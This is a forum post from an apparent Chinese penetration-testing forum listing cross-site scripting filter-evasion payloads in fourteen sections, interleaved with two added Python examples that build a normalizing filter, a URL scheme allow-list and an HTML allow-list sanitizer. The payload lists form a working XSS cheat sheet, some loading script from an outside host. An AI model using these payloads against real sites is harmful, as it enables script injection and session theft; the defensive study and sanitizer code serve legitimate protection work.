中国网络渗透测试联盟

Title: Introduction to Cross Site Scripting (XSS) attack techniques

Author: admin    Time: 2012-12-31 09:59
1. Change the case of the characters

    <sCript>alert('d')</scRipT>
2. Add extra characters to evade regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Replace the .js extension with another extension

    <script src="bad.jpg"></script>
4. Put the JavaScript inside a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }
5. Insert other characters into the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use a tab or a newline to evade

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> newline

    (The gaps inside "javascript" are tab and newline characters; the forum has flattened them to spaces here.)
7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" may also be dropped)

    (The forum rendered the hex-encoded attribute values, so only the decoded source survives below.)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
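Sections 1 through 8 all exploit the same defensive mistake: the filter pattern-matches the raw input, while the browser interprets a decoded, escape-resolved, whitespace-stripped, case-folded form. The following Python is an added example, not code from the original post: it runs a naive blacklist over constructed samples of the evasions above, shows that canonicalizing before matching closes those particular gaps, and then shows the allow-list check for URL-valued attributes that should be used instead of any blacklist. The sample strings (including the numeric-entity rendering of section 8), the regexes and the function names are my own.

```python
import html
import re

# Constructed samples, one per evasion from sections 1-8 above. The META line
# is my own rendering of section 8 with "j" written as a hex character reference.
SAMPLES = [
    "<sCript>alert('d')</scRipT>",                                   # 1: mixed case
    '<SCRIPT/SRC="t.js"></SCRIPT>',                                  # 5: "/" inside the tag
    '<img src="jav\tascr\nipt:alert(\'XSS3\')">',                    # 6: tab and newline
    '<DIV STYLE="width: expre\\ssi\\on(alert(\'XSS31\'));">',        # 7: CSS backslash escapes
    '<IMG STYLE="xss:expr/*anyword*/ession(alert(\'sss\'))">',       # 7: CSS comment
    '<META HTTP-EQUIV="refresh" CONTENT="0;url=&#x6A;avascript:alert(\'abc\');">',  # 8: hex entity
]

# A typical blacklist: literal, case-sensitive, applied to the raw input.
NAIVE = re.compile(r"<script|javascript:|expression\(")

def naive_blacklist_blocks(s):
    return NAIVE.search(s) is not None

CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\n]?|\\(.)")   # \41 (hex) or \s (identity)
CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)
CONTROL_WS = re.compile(r"[\x00-\x20]")

def normalize(s):
    """Canonicalize the way the browser will before it interprets the content:
    decode HTML character references, resolve CSS backslash escapes, strip CSS
    comments, drop ASCII whitespace/control bytes, lowercase. Whitespace is
    removed wholesale because the tokens we match never legitimately contain it."""
    s = html.unescape(s)
    s = CSS_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)) if m.group(1) else m.group(2), s)
    s = CSS_COMMENT.sub("", s)
    s = CONTROL_WS.sub("", s)
    return s.lower()

def normalized_blacklist_blocks(s):
    return NAIVE.search(normalize(s)) is not None

def count_blocked(checker, samples=SAMPLES):
    return sum(1 for s in samples if checker(s))

# The allow-list alternative for src/href/url() values: no scheme (relative URL)
# or a known-good scheme passes; any other scheme, however spelled, is rejected.
SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")
ALLOWED_SCHEMES = {"http", "https", "mailto"}

def url_is_allowed(url):
    u = CONTROL_WS.sub("", html.unescape(url)).lower()
    m = SCHEME.match(u)
    return m is None or m.group(1) in ALLOWED_SCHEMES

if __name__ == "__main__":
    print("naive blacklist blocks", count_blocked(naive_blacklist_blocks), "of", len(SAMPLES))
    print("normalized blacklist blocks", count_blocked(normalized_blacklist_blocks), "of", len(SAMPLES))
    for u in ("jav\tascr\nipt:alert('XSS3')", "&#x6A;avascript:alert(1)", "https://example.com/x.js", "t.js"):
        print(repr(u), "->", url_is_allowed(u))
```

The normalized blacklist is shown only to make the point about canonicalization; it is still a blacklist and a new spelling will eventually get past it. The allow-list check at the end does not need to know any spelling of `javascript:`, which is why it is the one to deploy.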
9. Script in an HTML tag

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code inside an SWF

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code and let the browser reassemble it.

    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
    </C></X>
    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME.

    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert(&quot;XSS&quot;)</SCRIPT>">
    </BODY></HTML>
13. Write a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
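Sections 9 through 14 show that a script tag is not needed at all: event-handler attributes, style, XML data islands, HTML+TIME, META and a long tail of URL-valued attributes all reach a script sink. The defence that covers the whole list is context-aware output encoding when no markup is wanted, and an allow-list of tags and attributes when some markup must be kept. The following is an added example in Python on top of the standard-library html.parser, not code from the original post; the allow-list contents, the DROP_WITH_CONTENT set and the scheme list are my own choices, and the example inputs are constructed from the payloads above.

```python
import html
import re
from html.parser import HTMLParser

# Allow-list: tag -> attributes it may keep. Everything not listed here (on*
# handlers, style, dynsrc, lowsrc, background, datasrc, ...) is dropped, not escaped.
ALLOWED_TAGS = {"p": set(), "br": set(), "b": set(), "i": set(),
                "a": {"href"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}
URL_ATTRS = {"href", "src"}
# Elements whose text content is itself code or data for a sink: drop content too.
DROP_WITH_CONTENT = {"script", "style", "xml", "iframe", "frameset", "embed", "object"}
SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")

def url_ok(value):
    # HTMLParser has already decoded character references in attribute values;
    # strip ASCII control/whitespace (the tab/newline trick) before reading the scheme.
    m = SCHEME.match(re.sub(r"[\x00-\x20]", "", value).lower())
    return m is None or m.group(1) in {"http", "https", "mailto"}

class AllowListSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip = 0          # > 0 while inside an element whose content is dropped

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1
            return
        if self.skip:
            return
        allowed = ALLOWED_TAGS.get(tag)
        if allowed is None:    # unknown tag (body, div, meta, t:set, ...): drop it, keep its text
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in allowed:                    # drops every on* handler and style
                continue
            if name in URL_ATTRS and not url_ok(value):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=True))   # text context: encode, never trust

    # Comments, processing instructions, CDATA and declarations (sections 11 and 12) are dropped.
    def handle_comment(self, data): pass
    def handle_pi(self, data): pass
    def handle_decl(self, decl): pass
    def unknown_decl(self, data): pass

def sanitize(untrusted_html):
    p = AllowListSanitizer()
    p.feed(untrusted_html)
    p.close()
    return "".join(p.out)

def escape_for_html(untrusted_text):
    """For the common case where no markup is wanted: encode for the HTML text
    and attribute contexts, so every payload above is displayed, not executed."""
    return html.escape(untrusted_text, quote=True)

if __name__ == "__main__":
    # Constructed inputs built from the payloads in sections 1, 6, 9, 10 and 14.
    for s in ('<img src="jav\tascr\nipt:alert(\'XSS3\')" onload="alert(1)">',
              '<body onload="alert(\'onload\')">hi</body>',
              '<a href="JavaScript:alert(1)">x</a>',
              '<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>',
              "<sCript>alert('d')</scRipT>after"):
        print(repr(s), "->", repr(sanitize(s)))
    print(escape_for_html("<sCript>alert('d')</scRipT>"))
```

Two design points matter more than the exact allow-list. First, rejected attributes and elements are removed rather than "cleaned", so there is no spelling of a handler or scheme to anticipate. Second, attribute values are re-encoded on output with `html.escape`, so a value the parser accepted cannot close the attribute or open a new tag when it is written back.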
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2